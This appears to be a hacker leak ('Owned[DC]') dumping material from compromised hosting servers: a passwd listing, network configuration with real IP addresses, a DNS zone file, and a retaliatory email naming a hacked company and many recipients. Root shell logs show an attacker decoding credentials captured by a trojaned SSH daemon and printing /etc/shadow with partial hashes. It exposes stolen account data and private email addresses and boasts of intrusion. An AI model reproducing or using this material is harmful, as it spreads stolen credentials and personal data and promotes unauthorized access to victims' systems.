|
||
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
||
halt:x:7:0:halt:/sbin:/sbin/halt
|
||
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
|
||
news:x:9:13:news:/etc/news:
|
||
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
|
||
operator:x:11:0:operator:/root:/sbin/nologin
|
||
games:x:12:100:games:/usr/games:/sbin/nologin
|
||
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
|
||
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
|
||
nobody:x:99:99:Nobody:/:/sbin/nologin
|
||
dbus:x:81:81:System message bus:/:/sbin/nologin
|
||
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
|
||
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
|
||
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
|
||
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
|
||
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
|
||
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
|
||
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
|
||
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
|
||
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
|
||
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
|
||
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
|
||
pcap:x:77:77::/var/arpwatch:/sbin/nologin
|
||
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
|
||
ntp:x:38:38::/etc/ntp:/sbin/nologin
|
||
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
|
||
named:x:25:25:Named:/var/named:/sbin/nologin
|
||
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
|
||
mailman:x:32001:32001::/usr/local/cpanel/3rdparty/mailman:/bin/bash
|
||
cpanel:x:32002:32003::/usr/local/cpanel:/bin/bash
|
||
amp3dne:x:32005:32006::/home/amp3dne:/usr/local/cpanel/bin/noshell
|
||
auxone:x:32006:32007::/home/auxone:/bin/false
|
||
badassb:x:32007:32008::/home/badassb:/usr/local/cpanel/bin/noshell
|
||
cache:x:32011:32012::/home/cache:/usr/local/cpanel/bin/noshell
|
||
cawn:x:32012:32013::/home/cawn:/bin/false
|
||
cfurn:x:32013:32014::/home/cfurn:/bin/false
|
||
cmilone:x:32016:32017::/home/cmilone:/usr/local/cpanel/bin/noshell
|
||
craig:x:32017:32018::/home/craig:/usr/local/cpanel/bin/noshell
|
||
dear:x:32021:32022::/home/dear:/bin/false
|
||
drireign:x:32024:32025::/home/drireign:/usr/local/cpanel/bin/noshell
|
||
fran459:x:32028:32029::/home/fran459:/usr/local/cpanel/bin/noshell
|
||
futonre:x:32030:32031::/home/futonre:/usr/local/cpanel/bin/noshell
|
||
greg93:x:32031:32032::/home/greg93:/usr/local/cpanel/bin/noshell
|
||
harry3:x:32034:32035::/home/harry3:/usr/local/cpanel/bin/noshell
|
||
jkaiser:x:32039:32040::/home/jkaiser:/usr/local/cpanel/bin/noshell
|
||
joshd:x:32040:32041::/home/joshd:/bin/false
|
||
kcole:x:32041:32042::/home/kcole:/usr/local/cpanel/bin/noshell
|
||
kidc:x:32042:32043::/home/kidc:/usr/local/cpanel/bin/noshell
|
||
kozmo:x:32043:32044::/home/kozmo:/usr/local/cpanel/bin/noshell
|
||
light:x:32047:32048::/home/light:/usr/local/cpanel/bin/noshell
|
||
lost:x:32049:32050::/home/lost:/usr/local/cpanel/bin/noshell
|
||
msupike:x:32057:32058::/home/msupike:/usr/local/cpanel/bin/noshell
|
||
neptunes:x:32058:32059::/home/neptunes:/bin/sh
|
||
nickg:x:32060:32061::/home/nickg:/usr/local/cpanel/bin/noshell
|
||
olliee:x:32061:32062::/home/olliee:/usr/local/cpanel/bin/noshell
|
||
pioneer:x:32063:32064::/home/pioneer:/usr/local/cpanel/bin/noshell
|
||
plumcree:x:32064:32065::/home/plumcree:/usr/local/cpanel/bin/noshell
|
||
porch46:x:32065:32066::/home/porch46:/usr/local/cpanel/bin/noshell
|
||
qstud:x:32066:32067::/home/qstud:/usr/local/cpanel/bin/noshell
|
||
rannman:x:32068:32069::/home/rannman:/usr/local/cpanel/bin/noshell
|
||
sheik:x:32079:32080::/home/sheik:/usr/local/cpanel/bin/noshell
|
||
starr:x:32081:32082::/home/starr:/usr/local/cpanel/bin/noshell
|
||
stopcand:x:32083:32084::/home/stopcand:/usr/local/cpanel/bin/noshell
|
||
timc14:x:32089:32090::/home/timc14:/usr/local/cpanel/bin/noshell
|
||
values:x:32090:32091::/home/values:/bin/sh
|
||
vitus:x:32091:32092::/home/vitus:/usr/local/cpanel/bin/noshell
|
||
yasha:x:32099:32100::/home/yasha:/usr/local/cpanel/bin/noshell
|
||
tickah:x:32103:32104::/home/tickah:/usr/local/cpanel/bin/noshell
|
||
charice:x:32106:32107::/home/charice:/bin/false
|
||
animal:x:32109:32110::/home/animal:/usr/local/cpanel/bin/noshell
|
||
ganja51:x:32110:32111::/home/ganja51:/bin/false
|
||
ganja:x:32111:32112::/home/ganja:/usr/local/cpanel/bin/noshell
|
||
mrwoot:x:32113:32114::/home/mrwoot:/usr/local/cpanel/bin/noshell
|
||
karbassi:x:32114:32115::/home/karbassi:/usr/local/cpanel/bin/noshell
|
||
nycrob:x:32115:32116::/home/nycrob:/bin/false
|
||
radical:x:32118:32119::/home/radical:/usr/local/cpanel/bin/noshell
|
||
jer1h:x:32119:32120::/home/jer1h:/bin/false
|
||
denial:x:32121:32122::/home/denial:/usr/local/cpanel/bin/noshell
|
||
jamesj:x:32123:32124::/home/jamesj:/usr/local/cpanel/bin/noshell
|
||
nglgnet:x:32124:32125::/home/nglgnet:/usr/local/cpanel/bin/noshell
|
||
nglgorg:x:32125:32126::/home/nglgorg:/usr/local/cpanel/bin/noshell
|
||
russ43:x:32126:32128::/home/russ43:/usr/local/cpanel/bin/noshell
|
||
berkel:x:32127:32129::/home/berkel:/usr/local/cpanel/bin/noshell
|
||
hastings:x:32128:32130::/home/hastings:/usr/local/cpanel/bin/noshell
|
||
knokes:x:32129:32131::/home/knokes:/usr/local/cpanel/bin/noshell
|
||
decalsby:x:32132:32134::/home/decalsby:/usr/local/cpanel/bin/noshell
|
||
lakeshor:x:32134:32136::/home/lakeshor:/usr/local/cpanel/bin/noshell
|
||
army:x:32136:32138::/home/army:/bin/false
|
||
curator:x:32138:32140::/home/curator:/bin/false
|
||
tradefx:x:32142:32144::/home/tradefx:/usr/local/cpanel/bin/noshell
|
||
national:x:32146:32148::/home/national:/usr/local/cpanel/bin/jailshell
|
||
robotey:x:32147:32149::/home/robotey:/bin/false
|
||
vincent:x:32148:32150::/home/vincent:/usr/local/cpanel/bin/noshell
|
||
psurge:x:32149:32151::/home/psurge:/usr/local/cpanel/bin/noshell
|
||
prime:x:32150:32152::/home/prime:/bin/false
|
||
digital:x:32151:32153::/home/digital:/usr/local/cpanel/bin/noshell
|
||
ddosmyi:x:32153:32155::/home/ddosmyi:/usr/local/cpanel/bin/noshell
|
||
blueacre:x:32155:32157::/home/blueacre:/usr/local/cpanel/bin/noshell
|
||
kujio:x:32157:32159::/home/kujio:/bin/false
|
||
untitled:x:32158:32160::/home/untitled:/usr/local/cpanel/bin/noshell
|
||
danielc:x:32159:32161::/home/danielc:/bin/false
|
||
billing:x:32163:32165::/home/billing:/usr/local/cpanel/bin/jailshell
|
||
syscrash:x:32164:32166::/home/syscrash:/usr/local/cpanel/bin/jailshell
|
||
hasting:x:32165:32167::/home/hasting:/usr/local/cpanel/bin/noshell
|
||
wrench:x:32166:32168::/home/wrench:/usr/local/cpanel/bin/noshell
|
||
apadana:x:32167:32169::/home/apadana:/usr/local/cpanel/bin/noshell
|
||
ircmilw:x:32169:32171::/home/ircmilw:/usr/local/cpanel/bin/noshell
|
||
blndbill:x:32170:32172::/home/blndbill:/usr/local/cpanel/bin/noshell
|
||
edgein:x:32171:32173::/home/edgein:/usr/local/cpanel/bin/noshell
|
||
hadrys:x:32172:32174::/home/hadrys:/usr/local/cpanel/bin/noshell
|
||
bebe:x:32173:32175::/home/bebe:/usr/local/cpanel/bin/noshell
|
||
mapmap:x:32176:32178::/home/mapmap:/usr/local/cpanel/bin/noshell
|
||
cpanel-horde:x:32003:32004::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpanel/bin/noshell
|
||
cpanel-phpmyadmin:x:32008:32009::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/local/cpanel/bin/noshell
|
||
cpanel-phppgadmin:x:32009:32010::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/local/cpanel/bin/noshell
|
||
kyle:x:32177:32179::/home/kyle:/bin/false
|
||
ctcped:x:32178:32180::/home/ctcped:/usr/local/cpanel/bin/noshell
|
||
fxarbitr:x:32179:32181::/home/fxarbitr:/usr/local/cpanel/bin/noshell
|
||
func88:x:32180:32182::/home/func88:/bin/bash
|
||
cpanelhorde:x:32010:32011::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
|
||
cpanelphpmyadmin:x:32014:32015::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
|
||
cpanelphppgadmin:x:32020:32021::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
|
||
cpanelroundcube:x:32023:32024::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
|
||
christa:x:32181:32183::/home/christa:/usr/local/cpanel/bin/noshell
|
||
bziem:x:32182:32184::/home/bziem:/usr/local/cpanel/bin/noshell
|
||
jb007:x:32183:32185::/home/jb007:/usr/local/cpanel/bin/jailshell
|
||
timc:x:32185:32187::/home/timc:/usr/local/cpanel/bin/noshell
|
||
munin:x:32186:32188::/home/munin:/bin/bash
|
||
noct:x:32187:32189::/home/noct:/usr/local/cpanel/bin/jailshell
|
||
jeffhem:x:32188:32190::/home/jeffhem:/usr/local/cpanel/bin/noshell
|
||
chemmer:x:32189:32191::/home/chemmer:/usr/local/cpanel/bin/noshell
|
||
daelenbe:x:32190:32192::/home/daelenbe:/usr/local/cpanel/bin/noshell
|
||
deevour:x:32191:32193::/home/deevour:/bin/bash
|
||
raven:x:32192:32194::/home/raven:/usr/local/cpanel/bin/noshell
|
||
lithium:x:32193:32195::/home/lithium:/usr/local/cpanel/bin/noshell
|
||
netdevil:x:510:510::/home/netdevil:/usr/local/cpanel/bin/noshell
|
||
sub:x:511:511::/home/sub:/usr/local/cpanel/bin/noshell
|
||
r00t:x:512:512::/home/r00t:/usr/local/cpanel/bin/noshell
|
||
maraka:x:513:513::/home/maraka:/usr/local/cpanel/bin/noshell
|
||
root@light [/home]#
|
||
|
||
|
||
root@light [~]# ifconfig -a
|
||
eth0 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
|
||
inet addr:66.197.170.181 Bcast:66.197.170.191 Mask:255.255.255.240
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
RX packets:66876060 errors:0 dropped:0 overruns:0 frame:0
|
||
TX packets:81485342 errors:0 dropped:1 overruns:0 carrier:0
|
||
collisions:0 txqueuelen:1000
|
||
RX bytes:652037555 (621.8 MiB) TX bytes:1600708482 (1.4 GiB)
|
||
Interrupt:16 Base address:0xd000
|
||
|
||
eth0:1 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
|
||
inet addr:66.197.170.182 Bcast:66.197.170.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:16 Base address:0xd000
|
||
|
||
eth0:2 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
|
||
inet addr:66.197.170.183 Bcast:66.197.170.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:16 Base address:0xd000
|
||
|
||
eth0:3 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
|
||
inet addr:66.197.170.185 Bcast:66.197.170.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:16 Base address:0xd000
|
||
|
||
eth0:4 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
|
||
inet addr:66.197.170.186 Bcast:66.197.170.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:16 Base address:0xd000
|
||
|
||
eth0:5 Link encap:Ethernet HWaddr 00:50:8D:C2:F0:C9
|
||
inet addr:66.197.170.184 Bcast:66.197.170.255 Mask:255.255.255.0
|
||
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
|
||
Interrupt:16 Base address:0xd000
|
||
|
||
gre0 Link encap:UNSPEC HWaddr 00-00-00-00-FF-00-00-00-00-00-00-00-00-00-00-00
|
||
NOARP MTU:1476 Metric:1
|
||
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
|
||
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
|
||
collisions:0 txqueuelen:0
|
||
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
||
|
||
lo Link encap:Local Loopback
|
||
inet addr:127.0.0.1 Mask:255.0.0.0
|
||
UP LOOPBACK RUNNING MTU:16436 Metric:1
|
||
RX packets:38383139 errors:0 dropped:0 overruns:0 frame:0
|
||
TX packets:38383139 errors:0 dropped:0 overruns:0 carrier:0
|
||
collisions:0 txqueuelen:0
|
||
RX bytes:3605264865 (3.3 GiB) TX bytes:3605264865 (3.3 GiB)
|
||
|
||
tunl0 Link encap:IPIP Tunnel HWaddr
|
||
NOARP MTU:1480 Metric:1
|
||
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
|
||
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
|
||
collisions:0 txqueuelen:0
|
||
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
|
||
|
||
root@light [~]# cat /var/named/ownage.net.db
|
||
; Modified by Web Host Manager
|
||
; Zone File for ownage.net
|
||
$TTL 14400
|
||
@ 86400 IN SOA dns.vitalspeeds.com. support.vitalspeeds.com. (
|
||
2006111702
|
||
86400
|
||
7200
|
||
3600000
|
||
86400
|
||
)
|
||
|
||
ownage.net. 86400 IN NS dns.vitalspeeds.com.
|
||
ownage.net. 86400 IN NS ns2.vitalspeeds.com.
|
||
|
||
|
||
ownage.net. 14400 IN A 72.20.28.204
|
||
|
||
localhost.ownage.net. 14400 IN A 127.0.0.1
|
||
|
||
ownage.net. 14400 IN MX 0 ownage.net.
|
||
|
||
mail 14400 IN CNAME ownage.net.
|
||
www 14400 IN CNAME ownage.net.
|
||
ftp 14400 IN CNAME ownage.net.
|
||
absolute.ownage.net. 14400 IN A 72.20.28.205
|
||
talk.about.ownage.net. 14400 IN A 72.20.18.131
|
||
complete.ownage.net. 14400 IN A 72.20.28.206
|
||
|
||
|
||
|
||
|
||
_______ _______ .________
|
||
\ _ \ ___ __\ _ \ | ____/
|
||
/ /_\ \\ \/ / /_\ \ |____ \
|
||
\ \_/ \> <\ \_/ \/ \
|
||
\_____ /__/\_ \\_____ /______ /
|
||
\/ \/ \/ \/
|
||
__ .__ __ .__
|
||
_____ _____ | | ______ __________ | | __ ___/ |_|__| ____ ____ ______
|
||
/ \\__ \ | |/ / _ \/ ___/ _ \| | | | \ __\ |/ _ \ / \ / ___/
|
||
| Y Y \/ __ \| < <_> )___ ( <_> ) |_| | /| | | ( <_> ) | \\___ \
|
||
|__|_| (____ /__|_ \____/____ >____/|____/____/ |__| |__|\____/|___| /____ >
|
||
\/ \/ \/ \/ \/ \/
|
||
__________ _________
|
||
\______ \_______ ____ / _____/ ____ ____
|
||
______ | ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
|
||
/_____/ | | | | \( <_> ) \ ___/\ \___
|
||
|____| |__| \____/_______ /\___ >\___ >
|
||
\/ \/ \/
|
||
|
||
|
||
Delivered-To: glafkos@gmail.com
|
||
Received: by 10.223.117.209 with SMTP id s17cs437044faq;
|
||
Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
|
||
Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
|
||
Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
|
||
Return-Path: <glafk0s@hotmail.com>
|
||
Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
|
||
by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
|
||
Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
|
||
Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
|
||
Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
|
||
Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
|
||
Thu, 2 Jul 2009 13:31:22 -0700
|
||
Message-ID: <BLU123-W96370B1DA99ABE688265BEB2F0@phx.gbl>
|
||
Return-Path: glafk0s@hotmail.com
|
||
Content-Type: multipart/alternative;
|
||
boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"
|
||
|
||
|
||
X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)
|
||
|
||
|
||
From: james knuth <glafk0s@hotmail.com>
|
||
To: <micronet@aol.com>, <mikespry.mdots@mdots.net>, <jstrat85@aol.com>,
|
||
<vlad@zealus.com>, <let995@yahoo.com>, <dejan@dwhost.net>,
|
||
<democreations@gmail.com>, <sales@hostforwebsite.com>,
|
||
<holeinthewallhosting@gmail.com>, <lucacri@gmail.com>, <k.ma@utoronto.ca>,
|
||
<dsecuya@gmail.com>, <peteslaughterbeck@yahoo.com>,
|
||
<michael.bastian@gmail.com>, <fletro@gmail.com>, <aalyazeedi@peo.gov.qa>,
|
||
<msprycha@makosolutions.com>, <glafkos@gmail.com>,
|
||
<horsepowerlounge@gmail.com>, <info@hostwebservice.com>,
|
||
<dave@bavariansolutions.com>, <keishaf18@yahoo.com>,
|
||
<adthorn@rochester.rr.com>, <mr22774556@live.com>, <vienna@consult.co.at>,
|
||
<bruno.matthys@gmail.com>
|
||
Subject: Makosolutions, LLC
|
||
Date: Thu, 2 Jul 2009 22:31:22 +0200
|
||
Importance: Normal
|
||
MIME-Version: 1.0
|
||
X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]
|
||
|
||
MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
|
||
- Hacked.
|
||
|
||
I will keep this short and simple, you hosted someone I want down and I decided to take down your company
|
||
and publish your customers information for that.
|
||
|
||
// This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..
|
||
|
||
|
||
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ
|
||
|
||
+----------------------------[ Owned ]----------------------------+
|
||
| Hack everyone you can and then hack some more |
|
||
| Owned[DC] v2 |
|
||
| _______ . _______ . _______ |
|
||
| Get in as anonymous, Leave with no trace. |
|
||
| |
|
||
+-----------------------------------------------------------------+
|
||
[ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]
|
||
|
||
08:24:44 up 519 days, 11:20, 3 users, load average: 0.05, 0.10, 0.09
|
||
makos2 pts/1 61.17.231.6 Fri Jun 26 08:12 still logged in
|
||
makos2 pts/3 61.17.231.6 Fri Jun 26 04:10 - 04:25 (00:15)
|
||
makos2 pts/7 61.17.231.6 Fri Jun 26 04:09 - 04:09 (00:00)
|
||
makos2 pts/5 61.17.231.6 Fri Jun 26 03:58 - 04:09 (00:11)
|
||
makos2 pts/4 61.17.231.6 Fri Jun 26 03:54 still logged in
|
||
|
||
wtmp begins Tue Jun 2 01:09:06 2009
|
||
Owned[DC]:[~]# date
|
||
Fri Jun 26 08:26:44 EDT 2009
|
||
Owned[DC]:[~]# uname -a
|
||
Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
|
||
Owned[DC]:[~]#
|
||
|
||
|
||
Owned[DC]:[~]# cd /var/run/ssh
|
||
Owned[DC]:[/var/run]# gcc -o decode decode.c
|
||
Owned[DC]:[/var/run]# ./decode ssh.old
|
||
HOOKOUT: 67.225.142.98 root:_censored_
|
||
HOOKIN: root:_censored_
|
||
HOOKOUT: 66.96.220.213 root:_censored_
|
||
.
|
||
.
|
||
.
|
||
HOOKIN: makos2:_censored_
|
||
HOOKOUT: 64.191.116.202 root:_censored_
|
||
|
||
Owned[DC]:[/var/run]# w
|
||
08:32:59 up 519 days, 11:28, 3 users, load average: 0.23, 0.22, 0.13
|
||
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
||
makos2 pts/0 61.17.231.6 03:53 3:54 0.13s 0.00s sshd: makos2 [priv]
|
||
makos2 pts/1 61.17.231.6 08:12 6.00s 0.06s 0.01s sshd: makos2 [priv]
|
||
makos2 pts/4 61.17.231.6 03:54 18:40 0.02s 0.01s sshd: makos2 [priv]
|
||
Owned[DC]:[/var/run]#
|
||
|
||
Owned[DC]:[/var/run]# cat /etc/shadow
|
||
root:_censored_:14418:0:99999:7:::
|
||
bin:*:13901:0:99999:7:::
|
||
daemon:*:13901:0:99999:7:::
|
||
adm:*:13901:0:99999:7:::
|
||
lp:*:13901:0:99999:7:::
|
||
sync:*:13901:0:99999:7:::
|
||
shutdown:*:13901:0:99999:7:::
|
||
halt:*:13901:0:99999:7:::
|
||
mail:*:13901:0:99999:7:::
|
||
news:*:13901:0:99999:7:::
|
||
uucp:*:13901:0:99999:7:::
|
||
operator:*:13901:0:99999:7:::
|
||
games:*:13901:0:99999:7:::
|
||
gopher:*:13901:0:99999:7:::
|
||
ftp:*:13901:0:99999:7:::
|
||
nobody:*:13901:0:99999:7:::
|
||
dbus:!!:13901:0:99999:7:::
|
||
vcsa:!!:13901:0:99999:7:::
|
||
rpm:!!:13901:0:99999:7:::
|
||
haldaemon:!!:13901:0:99999:7:::
|
||
netdump:!!:13901:0:99999:7:::
|
||
nscd:!!:13901:0:99999:7:::
|
||
sshd:!!:13901:0:99999:7:::
|
||
rpc:!!:13901:0:99999:7:::
|
||
mailnull:!!:13901:0:99999:7:::
|
||
smmsp:!!:13901:0:99999:7:::
|
||
pcap:!!:13901:0:99999:7:::
|
||
xfs:!!:13901:0:99999:7:::
|
||
pegasus:!!:13901:0:99999:7:::
|
||
mysql:!!:13901::::::
|
||
mailman:*:13901::::::
|
||
cpanel:*:13901::::::
|
||
systuser:!!:13901:0:99999:7:::
|
||
named:!!:13901::::::
|
||
clamav:!!:13901::::::
|
||
dorothy:_censored_:14126:0:99999:7:::
|
||
fileport:_censored_:13902:0:99999:7:::
|
||
icstune:_censored_:13902:0:99999:7:::
|
||
krisez:_censored_$LRTAc0.mSw4a72zaVSGJd0:13902:0:99999:7:::
|
||
kurwaun:_censored_$Y5V5WC30jDTB7h2HEuPWv0:13902:0:99999:7:::
|
||
makos:_censored_$6sPV/Yt2K90ah60vxrRE/.:14418:0:99999:7:::
|
||
makos2:_censored_$gUs1XceJmqOgEaHbeaQJN/:14418:0:99999:7:::
|
||
marcin:_censored_$CZjERtIuP0ob.TJhixQr5.:13902:0:99999:7:::
|
||
mdots:_censored_$JCyJyAL8iXQMeOQbF0jMo.:13902:0:99999:7:::
|
||
mklounge:_censored_$1Uw2zWBge5A2GLQqWS5Mn.:13902:0:99999:7:::
|
||
nashv:_censored_$h/475XUYdCfNl2N.mgPgV0:13902:0:99999:7:::
|
||
rogo:_censored_$6V878RKV1W/E4NPoGJHKu/:14192:0:99999:7:::
|
||
spanish:_censored_$h902kmWzyxUw1wwSMWWyp/:13902:0:99999:7:::
|
||
sprynet:_censored_$Zm2b8RGX0d8/qo5tSuJA3/:13902:0:99999:7:::
|
||
statewi:_censored_$EPK2zdk0Z9ET48XrRcsKJ1:14376:0:99999:7:::
|
||
tarocon:_censored_$6me2YVq3JQ0PeDFLV7Aml0:14073:0:99999:7:::
|
||
sprycha:_censored_$osQE8JvfI0lC/r464r1.30:13903:0:99999:7:::
|
||
hplounge:_censored_$59BBs5nOeFGPRO8hEj1F1.:13922:0:99999:7:::
|
||
cozy:_censored_$tj.rlOAmhdwJm6fdWPvv2.:13923:0:99999:7:::
|
||
cpanel-horde:*:13949::::::
|
||
cpanel-phpmyadmin:*:13949::::::
|
||
cpanel-phppgadmin:*:13949::::::
|
||
makospam:_censored_$9mTDWRT8N8NZ7hFUa.2Iv1:13962:0:99999:7:::
|
||
wiredbre:_censored_$jc6LduZz25ERlx0SSp6I8.:13980:0:99999:7:::
|
||
cybermun:_censored_$gSpGZJCyrf5eKoKXzoknb/:13984:0:99999:7:::
|
||
proto:_censored_$fuGMvBK.mAz7AO989Reqm/:14208:0:99999:7:::
|
||
tempecon:_censored_$M3wPHFn06YfnjqhpOoSis1:13995:0:99999:7:::
|
||
floralsi:_censored_$jboZSeeKKAecDPW7Xi8r01:13995:0:99999:7:::
|
||
serversh:_censored_$oh7hdFXLoQM7BtHaVIwDB0:13997:0:99999:7:::
|
||
simplify:_censored_$FRrjF78SYaCEyBK/zX9rU0:14025:0:99999:7:::
|
||
themunst:_censored_$YHtOc1ylvVbXQjSjCuMMS.:14017:0:99999:7:::
|
||
theregoe:_censored_$U1OUx/hznz7Z/cRxknMpV1:14019:0:99999:7:::
|
||
xbox360t:_censored_$52N4Y3wbF4I.j0xw0ybZv0:14027:0:99999:7:::
|
||
barbiedo:_censored_$dYASLs0QEHczZNK/xO4l60:14033:0:99999:7:::
|
||
c20q8anz:_censored_$5yj/Vw9bVQE1H8gFGnfwl0:14031:0:99999:7:::
|
||
bashingr:_censored_$40Rbu9u.CdR54/.QGx5hZ.:14034:0:99999:7:::
|
||
hawaiian:_censored_$YXD5Fqnc1wa47hXw5DS1z/:14036:0:99999:7:::
|
||
cnewyork:_censored_$auEIntz4K2naChQ6A8j42.:14035:0:99999:7:::
|
||
lasvegas:_censored_$O8g7FiIF7Z.G1BLakQhjl.:14035:0:99999:7:::
|
||
contourp:_censored_$Mhq3nTK4slo39beK7mAsV/:14036:0:99999:7:::
|
||
musiconl:_censored_$g.3Wk0K3xRAd8bzMfetZz0:14036:0:99999:7:::
|
||
jokesfor:_censored_$332BH8Z2tQ1.PoLUj0aeQ.:14036:0:99999:7:::
|
||
cpanelhorde:*:14037::::::
|
||
cpanelphpmyadmin:*:14037::::::
|
||
cpanelphppgadmin:*:14037::::::
|
||
cpanelroundcube:*:14037::::::
|
||
okcityco:_censored_$sRF34svAMlqkUvqPQyEXq/:14039:0:99999:7:::
|
||
pasadena:_censored_$IDwtddZgxQPTnlqIEiRd/.:14039:0:99999:7:::
|
||
ionsigns:_censored_$Vg7G3SaNWflS1zTsWy.b50:14292:0:99999:7:::
|
||
cherubim:_censored_$DIouDCIf0zrNJHJj1Hijy0:14042:0:99999:7:::
|
||
sanfranc:_censored_$G1VXarugAKLCe0mTh1mjz1:14042:0:99999:7:::
|
||
jillrace:_censored_$GWkRrIh91Slq3d4fP4Ysh/:14042:0:99999:7:::
|
||
portland:_censored_$9RiJMMNQaYXloc80zzyve/:14042:0:99999:7:::
|
||
newyorkc:_censored_$r/hkQYZAe3aMB2h72VDVE.:14042:0:99999:7:::
|
||
renoconc:_censored_$HreCJL6jaESpLR4GNQU2X0:14042:0:99999:7:::
|
||
indianap:_censored_$K69/LXuR2.0309THXC3IR1:14042:0:99999:7:::
|
||
lvconcer:_censored_$0SOI7NDDrTatWwv1qUtKw.:14042:0:99999:7:::
|
||
miamicon:_censored_$10LHNdaYHowHSELzvFlfW.:14042:0:99999:7:::
|
||
whatupla:_censored_$qBSgboCAfNT0K55szVNGv0:14322:0:99999:7:::
|
||
zconcert:_censored_$kj.cK7mz2sEam.1wusPIQ1:14042:0:99999:7:::
|
||
tokyocon:_censored_$bdBjHYHi4oSDqBsL/yHuS0:14042:0:99999:7:::
|
||
uhouston:_censored_$x/aaM4f.jxN1wMDYHnc/h.:14042:0:99999:7:::
|
||
raleigh:_censored_$tEFo7l/iuN.pRKxTSlCCe1:14042:0:99999:7:::
|
||
flagstaf:_censored_$mKfuTWqfxbt3X1ddt5fUK/:14042:0:99999:7:::
|
||
phoenixa:_censored_$5R9rVBeLzwZtIXTgSbfI9/:14042:0:99999:7:::
|
||
ap6mz0q2:_censored_$cfbHH6J9VN9UOr3KBZ9ts.:14042:0:99999:7:::
|
||
xq9s3ma:_censored_$vVfRtpDm4j1Uj08OcYmwG1:14044:0:99999:7:::
|
||
jacksonv:_censored_$yOc3XavkD3xVFrV/IyvKF.:14046:0:99999:7:::
|
||
exspry:_censored_$R/sFQOBW4EgGIThYQj28k.:14047:0:99999:7:::
|
||
exmako:_censored_$/YcknpKQlOCdzVzgWbJRM/:14048:0:99999:7:::
|
||
quagmire:_censored_$IrcWo57PYhw9lyNR8FlqR.:14049:0:99999:7:::
|
||
njmakos:_censored_$eLWUwH4sqaSjYNDDQD8uc.:14049:0:99999:7:::
|
||
vicscust:_censored_$zD1TjhIzUZXrqOlHSMKDv0:14220:0:99999:7:::
|
||
losangel:_censored_$ApXNU5tVAZvvTZ8wKhfrG0:14053:0:99999:7:::
|
||
newengla:_censored_$1inQwoEWSRR/mbuH/U8fj1:14053:0:99999:7:::
|
||
